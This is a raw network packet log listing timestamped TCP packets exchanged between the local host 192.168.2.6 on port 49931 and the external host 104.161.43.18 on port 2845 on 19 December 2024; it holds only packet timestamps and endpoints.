                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.900402069 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.900432110 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.901391029 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.901406050 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.901513100 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.902394056 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.902410030 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.902439117 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.903387070 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.903534889 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.903639078 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.904452085 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.904503107 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.904547930 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.905571938 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.905615091 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.905642033 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.906512976 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.906577110 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.906615019 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.907610893 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.907663107 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.907736063 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.908696890 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.908711910 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.908752918 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.909715891 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.909761906 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.909790039 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.910758972 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.910944939 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.911010027 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.911777020 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.911860943 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.911928892 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.912875891 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.912906885 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.912914038 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.914036036 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.914081097 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.914182901 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.915302992 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.915326118 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.915393114 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.916115046 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.916181087 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.916188955 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.917207003 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.917292118 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.917340040 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.918087006 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.918219090 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.918225050 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.919107914 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.919202089 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.919290066 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.920141935 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.920269012 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.920347929 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.921386957 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.921435118 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.921494007 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.922245979 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.922343016 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.922411919 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.962311029 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.060394049 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.060484886 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.060678005 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.060848951 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.060991049 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.061183929 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.061969995 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.061995029 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.062145948 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.062925100 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.063043118 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.063117981 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.064057112 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.064081907 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.064146042 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.065023899 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.065077066 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.065176010 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.066099882 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.066184044 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.066757917 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.067114115 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.067305088 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.068234921 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.068299055 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.068310976 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.068360090 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.069381952 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.069509983 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.069619894 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.070297956 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.070705891 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.070858002 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.071353912 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.071374893 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.071429968 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.072390079 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.072508097 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.072679996 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.073460102 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.073474884 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.073565960 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.074495077 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.074510098 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.074584007 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.075517893 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.075589895 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.075632095 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.076581955 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.076744080 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.076860905 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.077625036 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.077640057 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.077702045 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.078829050 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.078845978 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.078919888 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.079785109 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.079904079 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.079963923 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.080902100 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.081089973 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.081671953 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.082032919 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.082048893 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.082112074 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.083247900 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.083369970 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.083440065 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.084180117 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.084431887 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.084477901 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.085122108 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.085340977 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.085412025 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.086078882 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.086225986 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.086371899 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.087147951 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.087163925 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.087308884 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.088181019 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.088239908 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.088390112 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.089159966 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.089246035 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.089589119 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.090615034 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.090631008 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.090692043 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.091376066 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.091451883 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.091521978 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.092430115 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.092503071 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.092605114 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.093399048 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.093518019 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.093733072 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.094479084 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.094603062 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.094685078 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.095566988 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.095592976 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.095638990 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.096470118 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.096544981 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.096709967 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.098375082 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.098736048 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.098798990 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.099833965 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.099908113 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.099986076 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.100353956 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.100369930 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.100465059 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.101015091 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.101031065 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.101130009 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.101735115 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.101859093 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.102027893 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.102771997 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.102987051 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.103257895 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.103956938 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.104227066 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.104455948 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.104939938 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.105025053 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.105108023 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.105936050 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.106086969 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.106180906 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.107059002 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.107208967 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.107281923 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.108048916 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.108201027 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.109189987 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.109289885 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.109323025 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.109381914 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.110145092 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.110415936 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.110615015 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.111361027 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.111437082 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.112426996 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.112493038 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.112497091 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.112684011 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.113354921 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.113470078 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.114371061 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.114386082 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.114454031 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.114454031 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.115362883 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.167212963 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.252933025 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.253037930 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.253106117 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.253407001 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.253545046 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.253596067 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.254442930 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.254458904 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.254666090 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.255613089 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.255630016 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.256046057 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.256658077 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.256742001 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.257700920 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.257755041 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.257765055 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.257819891 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.258611917 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.258764029 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.258846998 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.259860992 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.260009050 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.260411024 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.260788918 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.260843039 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.260977983 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.261792898 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.261931896 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.262042046 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.262840033 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.263019085 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.263149977 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.263871908 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.264004946 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:16.264081955 CET499312845192.168.2.6104.161.43.18
